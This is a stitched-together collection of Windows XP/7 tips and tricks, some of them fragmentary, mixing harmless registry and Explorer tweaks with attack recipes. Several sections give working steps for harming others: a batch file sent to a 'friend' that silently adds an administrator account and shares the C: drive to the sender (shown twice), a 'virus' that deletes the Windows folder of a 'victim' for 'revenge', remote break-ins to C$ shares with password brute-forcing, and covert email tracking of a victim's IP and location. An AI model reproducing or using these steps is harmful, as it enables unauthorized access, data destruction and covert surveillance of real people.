Enable GOD mode in Windows 7

Windows 7 is the smarter and faster operating system developed by Microsoft. There are many setting options available in the Control Panel of Windows 7, but sometimes it is difficult to find the perfect setting option. If you have to change a lot of settings in your Windows 7, then it will take a lot of time in Control Panel, so here I am sharing a trick in which you can do all the settings of Windows 7 like you do in the Control Panel directly from a single window. The trick is very easy, you just have to create a folder and that folder will work as Settings pane. People call this trick as Windows 7 God Mode.

The method:

Create a new folder and name it anything.
Now, rename the folder by pressing F2 or Right-click>>Rename and give it this new name: Settings.{ED7BA470-8E54-465E-825C-99712043E01C}
After renaming the folder, its icon will be changed. Double click the folder to open it.

Now, you will see a screen like below. Here, you can change all the settings of your Windows 7 OS.

Command Prompt on Right-Click

Many computer users, specially the programmers, need to launch a command prompt window every once in a while to execute some dos/shell commands. The problem is, when a command prompt window launched, the default path is normally the system path or the user profile's path. The users will then have to do all the "cd" commands to change the directories to the path he/she wants.

This trick shows you how to add an option called "Command Prompt" when you right-click on a folder in Windows. With this option, a Command Prompt Window will launch and its current directory will be the path to the folder you've selected.

Here's what you'll get:

Manually editing the registry:

Start > Run
Enter "regedit" and hit Enter
Expand to "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shell"
Right-click on "shell" and select New > Key
Make sure a new key is created under "shell". Change the name of this key to "Command Prompt"
Right-click on this new key "Command Prompt" and select New > Key
Change the name of this key to "command"
Here's what we should have:
Double-click on the "(Default)" text on the right window to bring up the edit box
Enter this text into the Value Data field:
cmd.exe "%1"
Click OK and close the registry

Open a dos prompt we will only need a dos prompt , and windows xp…

-Basics-
Opening a dos prompt -> Go to start and then execute Run and write
cmd and press ok

Now insert this command: net
And you will get something like this

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and write there:

dir
pause

And now save this as test.bat and execute it.
Funny ain't it ?

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a pad
The dos prompt will help you to test if the commands are ok
and the notepad will be used to make the .bat file.

Command 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you want

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.

Command n 3-> net share system=C:\ /unlimited
This commands share the C: drive with the name of system(system name...can be found out in My Computer properties).

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.

Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!

Clean your RAM for more space using Notepad

We can clean the RAM just by using a Notepad application. This does not require any advanced software. The process to do so is as follows :

Open Notepad

Type
FreeMem=Space(64000000)
save it as “CleanRAM.vbs” on desktop
Note: Type the name of file along with inverted commas
Run the file and your RAM may be free.
Of course you can edit the code in the file for a greater “cleaning-progress”.
For example:
FreeMem=Space(1280000000)
FreeMem=Space(2560000000)
FreeMem=Space(5120000000)
FreeMem=Space(10240000000)

1). Start any application, say Word. Open some large documents.

2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.

3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).

4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.

5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM.

In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.

There are many keywords for having a detailed and specific search.Some of them are:

define: - This google operator will find definitions for a certain term or word over the internet

. Very useful when you come across a strange word when writing a post. I use this as a google dictionary. example : (define cumputer)

info: - The Google info operator will list the sets of information that Google has from a specific website (i.e. info:http://arunpillai90.blogspot.com)

site: - This Google operator can be used to see the number of indexed pages on your site (i.e.site:www.arunpillai90.blogspot.com) Alternative it can also be used to search for information inside a specific site or class of sites.

link: - This Google link operator allows you to find back links pointing to your site. Unfortunately the count is not updated frequently and not all backlinks are shown

allinurl: - Using this Google operator will limit the search to results that contain the desired keywords on the URL structure. (i.e. allinurl:dailyblogtips)

fileformat: - Useful Google operator for finding specific file formats. Sometimes you know that the information you are looking for is likely to be contained in a PDF document or on a PowerPoint presentation, for instance. (i.e. “fileformat:.pdf market research” will search for PDF documents that contain the terms “market” and “research”)

DELETE AN UNDELETABLE FILE

Delete An "undeletable" File

Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
At the command prompt type DEL where is the file you wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Close Task Manager.

Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal

Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

From there...log on to http://thepiratebay.org (another proxy server).

Now search the torrents which you require.

Now click on the name of the torrent from the results (Donot click on the green downward arrow).

Now right click on the link named "Download this torrent" and copy the link location.

Now log on to http://txtor.dwerg.net/

paste the url of the torrent over there.Sometimes you need to type it yourself!

Now click on "Download"

It prompts for an action (open,save).Select "save"
Note: The torrent will be in .txt format ...no worries!

Important step: Save that file and rename it as 'anything.torrent' (Just change the .txt extension to .torrent)

Thats it..now add this torent in your utorrent and see it download!! Enjoy downloading!

Double passwords : Strong passwords

Strong passwords should have a significant length and cannot contain normal words. Only random digits and letters of different case. Such passwords are extremely hard to remember and it takes time to enter. But, even strong passwords have their weaknesses. When you type a password, it can be intercepted by a spy program that logs all your keystrokes. Others can see what you type (even if the password field on the screen is masked, the password can be read by buttons you hit on your keyboard.)

Until now, the only solution was to buy a secure token. A secure token is a hardware key that is used instead of or in addition to your normal password authentication. There are two main problems with the hardware solution, though. First, it is expensive. And second, you can use them only with software that has built-in support for this method of authentication.

But, from now on, you can turn any USB flash drive into a secure token! No need to purchase an additional expensive device. All you need is about 2 megabytes of free space on your flash drive or other USB gadget, such as an MP3 player, PDA or even a USB-pluggable mobile handset.

Make your own virus!!!

Yes, Now it is possible for you to have your own virus. But before doing anything yourself first of all you need to read the whole article first. And let me remind you that any problem occurs after you do anything then you are solely responsible for what has happened and I will not be responsible.

First of all Open your notepad and type the following......... del c:\boot।ini c:\del autoexec.bat Now Save as anyname.exe. Create this in C: drive

The only thing you need is Notepad.

Create a text file called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then save it as "Test.cmd".
Now run the file "Test.cmd"go to C:\ and you'll see your Test.txt is gone.

Now, the real work :

Go to Notepad and type erase C:\WINDOWS and save it as findoutaname.cmd.
Now DON'T Run the file or you'll lose your WINDOWS map.

So, that's the Virus. In this way you can make a virus to delete any file you want.

Now to take revenge. Send you file to your victim. Once victim opens it. WINDOWS map is Deleted. And he will have to install WINDOWS again.

Beware : Its simple but a strong virus that can delete anyones Windows OS ...Note : I am not Taking any Responsibilties if by this you damage your windows.

1) Run cmd(commandprompt)

2) Type nbtstat -A

For example,if you have found the IP address 123.23.13.22 available and with open ports,then type:

nbtstat -A 123.23.13.22

If you get the hex code <20> beside the name of the victim's computer, then it means that the victim's computer has sharing enabled(Its a good sign!)

3) Now if you get that hex code <20> then type:

net use z: \\123.23.13.22\SharedDocs

It shows 'The command completed successfully'

4) Now open My computer,there you will find the drive Z,open it,its the shared documents folder of the victim.

5) Now if you want to access the drives of that system,then run cmd,then type:

net use y: \\123.23.13.22\C$ "" /u:""

Now it will prompt for you to give the username and password of that system...The username will be shown on the drive Z as 'SharedDocs on xxxxxx(123.23.13.22)'

6) Try guessing the password or Bruteforce it. After getting the password,type it and you will get the access to your target computer.

7) If the message 'Access is denied' appears,then it means you have to evade his firewall..,use Firekill Firewall Killer2000

8)After doing this,repeat the step 5 and give the username and password and it will surely show ' The command completed successfully.'

9) Thats it...you will be in the root of the victim's com.

Shutdown XP Faster

When a user shuts down Windows XP, first the system has to kill all services

currently running. Every once in a while the service does not shut down

instantly and windows gives it a change to shut down on its own before it kills it.

This amount of time that windows waits is stored in the system registry.

If you modify this setting, then windows will kill the service earlier. To modify

the setting, follow the directions below:

Start Run.
go to Regedit.

Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.

Click on the "Control" Folder.

Select "WaitToKillServiceTimeout"

Right click on it and select Modify.

Set it a value lower than 2000 (Mine is set to 200)...

Finding a invisible user on Yahoo! Messenger

First Method: Doodle Method

1. Double Click on the user whose status you want to check.

2. A message window will open.

3. Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.

4. The last step and the most important step. After loading the Doodle IMVironment, there will be two possibilities.

a) If the user is offline, the Doodle area will show “waiting for your friend to load Doodle” continuously.

b) If the user is online (in invisible mode), after few seconds (it can take up to one minute, depending on connection speed), you will get a blank page. So the user is online!

Second Method: Voice Chat Method

1. Double Click on the user whose status you want to check.

2. Click on “Voice” icon on the toolbar, or select “Contact” menu and select “Enable Voice Chat” .

3. The deciding part… there are 2 possible results:

a) If the user is offline, you will get this message: “Internal server error. Cannot obtain voice token to start voice chat.”

b) If the user is invisible (actually online), you will see the Voice Toolbar.

Third Method: Conference Invitation

1. Right Click on the user whose status you want to check.

2. When the menu appears, select Invite to Conference.

3. A window will appear. See at the right pane, the username you selected will be there. Now, click Invite.

4. The deciding part… there are 2 possible results:

a) If the user is offline, you will get this message: “None of the users in the invite list are available to join the conference. Please try at a later time.”

b) If the user is invisible, you will get a window similar saying: “You are now logged into voice conference ]

Here I'll be explaning you how to make simple website stepwise :

Prerequisites : basic HTML knowledge or atleast know something about an HTML!!!

Make a normal HTML page using any software.I made it using Microsoft Publisher.U can use other softwares like Adobe Flash also.Name the page as index.html. name it as index only since the homepage of any website is named as "index".
Now you have to have a domain(ex. .com, .net , .in etc).If u don't have click here and register a domain for free. Else you may register for any other domain you know.
Now you need a web hosting server where you will be able to upload your files.there are many free web hosting servers. For some click here.
After registering and verifying both your domain and web-server (you may sometimes have to specify your web host server addresses(ex: www.s1.awardspace.com.n1 etc) in you domain page) , you are now ready to publish the index page which you made in the first step. In the web host page you will have some file manager option where you can upload your index.html .
Now open a new page and type your web address and you will be able to see your page(NOTE: some web servers may take time in publishing web pages.)Then you can make many other html pages and upload them and make your website further!!!

How to Compile ?
1. Download the source code along with the the compiled module(virus) Here.
2. Compile the sourcecode using any C/C++ compiler.
3. To test, run the compiled module. It will block the sites that is listed in the source code.
4. Once you run the file block_Site.exe, restart your browser program.Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

Well u wanna track ur victim or want to get his ip, location, browser settings, language or timings.... all u have to do is get his e-mail id...
Once u have it.
Go to www.readnotify.com
register there...
Once registered . . . send a mail to ur victim by the email id u registered at readnotify.com
But before sending the mail just add ".readnotify.com" with the victims id.. for example
xxxxx@yahoo.com.readnotify.com
and then send it...
when ever victim opens it his all the info will be mailed to u.
which can b very useful for the hackers.
Note = U can also change the settings in www.readnotify.com

Open a dos prompt we will only need a dos prompt and windows xp operating system

-Basics-

Opening a dos prompt -> Go to start and then execute and type
cmd and press ok

Now insert this command: net
And you will get something like this

In this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and write there:

And now save this as test.bat and execute it.

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open your dos prompt and a notepad.
The dos prompt will help you to test if the commands are ok
and the notepad will be used to make the .bat file.

Command #1-> net user prudhvi /add
What does this do? It makes a new user called prudhvi you can put
any name you want

Command #2-> net localgroup administrators prudhvi /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.
If you got an American version the name for the groups is Administrators and for the Portuguese version is administrators so it's nice you know which version of windows xp you are going to try share.

Command #3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.

Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user.First we need to make a session with the remote computer with the net use command,you will execute these commands from your dos prompt.

Command #1 -> net use \\victimip neo
This command will make a session between you and the victim.Of course where it says victimip you will insert the victim ip.
Command #2-> explorer \\victimip\system
And this will open a explorer windows in the share system which is the C:/ drive with administrators access!!!

Hey Guys just follow thse simple steps and change the name of your Recycle Bin(where temporarely deleted files are stored)
1)Goto 'start' menu and Choose 'Run' command.
2)Type 'regedit' (without inverted commas). U will see Registery Editor Window on Ur Screen. 3)Now, On the Left Hand Side of the Window you'll see a Tree of folders Just DoubleClick on the HKEY_CURRENT_USER folder>Now in the new folder Tree DoubleClick on the 'Software' folder > then DoubleClick on 'Microsoft' folder>'Windows' folder>'Current Version' folder>'Explorer' folder>'CLSID' folder.
4)Now, You will see a Tree of 3 or 4 folder(don't worry about the no. of folders). Just Click on the folder : '{645FF040-5081-101B-9F08-00AA002F954E}'.
5)Finally, after Clicking on '{645FF040-5081-101B-9F08-00AA002F954E}' folder Goto the Right Hand Side of the Same window and
Double Click On the Default Option and Write in the name You want for Your Recycle Bin e.g. :- Trash #. CLick O.K. button. Goto Your Desktop and Refresh the Desktop and See the magic. Your Recycle Bin has been Renamed.

Now save this text file as loc.bat

Create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat

Now you can see 2 batch files loc and key.Press loc and the folder games will change to control panel and you cannot view its contents.Press key and you will get back your original folder. try it out!!!!!!!

Important note:How to rename your text files as bat files?
Just go to my computer->tools->folder options->go to the view tab.
Now uncheck the 'Hide extensions for known file types'.Press apply.
Now rename ur text files as bat files.

How to Restart Windows without Restarting your PC

1.Firstly open a blank Notepad file.
2. Now write .LOG as the first line in the file, then press enter. Now save the file and close it.
3.Open the notepad file now and you will find that the current date and time has been

appended (put) at the end and the cursor is in the next line.
4. Type your notes and then save and close the file.

5. Each time you open the file, Notepad repeats the process,that is it appends the date and time

to the end of the file and places the cursor below it.

Now this is specially for the ones who are too lazy to get up even when the trust cellphone dies screeching its lungs out. Its pretty simple .

Creating the playlist create a playlist of your favourite songs in Winamp, WMP or any other player. Export the playlist as a M3U playlist. M3U is generally accepted by almost every player.

Triggering the alarm point to start> programs >accessories > system tools >scheduled tasks

Create a new task and choose program as windows media player or winamp (May work with others too but I haven't tried anything else)
Choose "daily",
Enter the time and choose "every day" at next screen.
It would now ask for password (leave blank in case you don't have one)
Right click on the newly created task and check the "run only if logged in" check box.
In the properties. Append the path to the playlist you created in the "run" text box. It should now look like Code:

The text inside quotes is my WMP's path. It may vary for you. The text after WMP's path is the one to the playlist. Click OK and you're done!!!

Enable your task manager!

Task manager has been disabled by the administrator" message. How did this happen and how can this be corrected ? There are couple of ways to fix it..........

The situation's pretty simple. If you right click on the clock in the Windows taskbar, the Task Manager item is grayed out:

So, how did this happen?

As we'll see in a moment, there are settings you can access as an administrator that would allow you to disable and enable Task Manager in this way.

You didn't do that, you say?

Then a virus probably did.

Disabling Task Manager is one way viruses try to make it harder for you to deal with their infections. Before proceeding any further, you should run a complete and up-to-date anti-virus scan of your machine. It's possible, perhaps even likely, that you've been infected.

Once you come back virus-free, you can proceed with the fix.

If you have Windows XP Pro, there's a nifty user interface to directly edit the setting you want to repair. Click Start, then click Run and type in gpedit.msc:

And press OK. This runs the Group Policy Editor.

Once in the Group Policy Editor, expand in turn:

User Configuration
Administrative Templates
System
Ctrl+Alt+Del Options

You should see something much like this:

Double click on Remove Task Manager to change its setting:

It should be enough to click on Not Configured and then OK and Task Manager is available once again.

If you don't have Windows XP Pro, then you'll need to edit the registry manually.

Click Start, then click Run, type in regedit, and click on OK.

Expand these registry keys in turn:

This article will tell you how to makes shortcuts on your keyboard
that are Ctrl + Alt + "Any Key Of Your Choice." Heres what you have to do:

1. Make shortcuts of the programs you want shortcuts to somewhere in your start menu.

2. Right click on one of them and click on Properties.

3. Now click on Shortcut if its not already there.

4. Click on ShortCut Key's white area box and type a letter other than ones used
by XP like Ctrl Alt Del and stuff. I used the number 1 through 0 (after 9).

Do that and it should work. If it doesn't make sure its in the Programs part of
the Start Menu, I haven't tried outside programs, if it still doesn't work go to
the help section and ask a microsoft person.!!!

Pump Up the Bandwidth!

Windows XP Professional has a feature built into it called QoS
(Quality of Service). This feature allows the operating system
to optimize bandwidth allocation for different services.
While books are filled with incomprehensible information on this subject,
what you need to know is that this feature actually throttles back your
available bandwidth. QoS reserves 20% of the available bandwidth on any
connection for itself. This means you can't use it for downloads
and LAN connections! You can cut the QoS brick tied to the back of your
network connection by performing the following steps:

Click Start and then click the Run command.
In the Run dialog box, type gpedit.msc in the Open text box.
Click OK.
In the Group Policy window,
expand Computer Configuration,
and then expand Administrative Templates.
Expand Network and click on QoS Packet Scheduler.
Double click on the Limit reservable bandwidth entry in the right pane.
Select the Enabled option and then type 0 in the Bandwidth limit (%) text box.
Click Apply and then click OK.
Close the Group Policy window and restart the computer
(not sure if you need to restart the computer, but do it anyhow).
QoS is enabled by default on all adapters. If you disabled it for some reason,
make sure it is enabled, or else it's possible that the 20% limitation
will be enforced anyhow. There's not too much documentation of this feature,
so if you find it improves your bandwidth, let us know!!!

2)Now rename the folder with a space(U have to hold ALT key and type 0160).
3)Now u have a folder with out a name.
4)Right click on the folder>properties>customize. Click on change icon.
5)Scroll a bit, u should find some empty spaces, Click on any one of them.click ok

Change XP Boot Screen

If you would like to change your boot up screen follow the directions below.
These instructions assume that you have a place to download the boot screen from the net.
If you would like to download a boot screen, visit http://www.themexp.org

1. Backup (copy) the file %windir%\system32\ntoskrnl.exe (most likely C:\windows\system32\ntoskrnl.exe - the boot screen)
2. Download the .zip to your computer
3. Extract ntoskrnl.exe to a directory other than %windir%\system32 (most likely C:\windows\system32)
4. Reboot your computer into Safe Mode (hit F8 before the boot screen) or into true DOS (from a boot disk)
5. Overwrite the file %windir%\system32\ntoskrnl.exe (which should have been backed up) with the extracted exe
6. Reboot your computer as you normally would

When you hover your mouse pointer over a folder icon, you see a pop-up that contains the folder's size and the names of the first few files or folders it contains. There are cases when this information, along with the folder's name, is helpful in identifying the folder's contents; however, there are other times when you have to open the folder to really see what's in it.

You can add a detailed explanation about the folder's contents to the pop-up by creating a Desktop.ini file, which is a straight text file, and adding a special entry to it.
1. Create a new Notepad *.txt file and type in the following:
  [.ShellClassInfo]
  InfoTip=Type your detailed description
2. Save the file as Desktop.ini and copy it into the folder you want to describe
3. Go to File > Save and close Notepad
4. Click Start > Run, type in the command line, ATTRIB +S "folder name" (e.g. ATTRIB +S " C:\Documents and Settings\[your userid]\My Documents")
You'll see your detailed pop-up description the next time you mouse over that folder.
Note: If you don't see a pop-up when you mouse over a folder, you need to enable a couple of settings. Go to Tools > Folder Options and then select the View tab. Then, in the Advanced Settings list, select the check boxes for Display File Size Information In Folder Tips and Show Pop-Up Description For Folder And Desktop Items. Click OK

The Desktop.ini file is a text file that provides Windows with configuration information. Please note, this tip, while not overly difficult, is of a more advanced level. Before you change any *.ini settings, make sure you copy and paste the original text into an e-mail, or somewhere else so that you can restore the original file in the event of unexpected results.
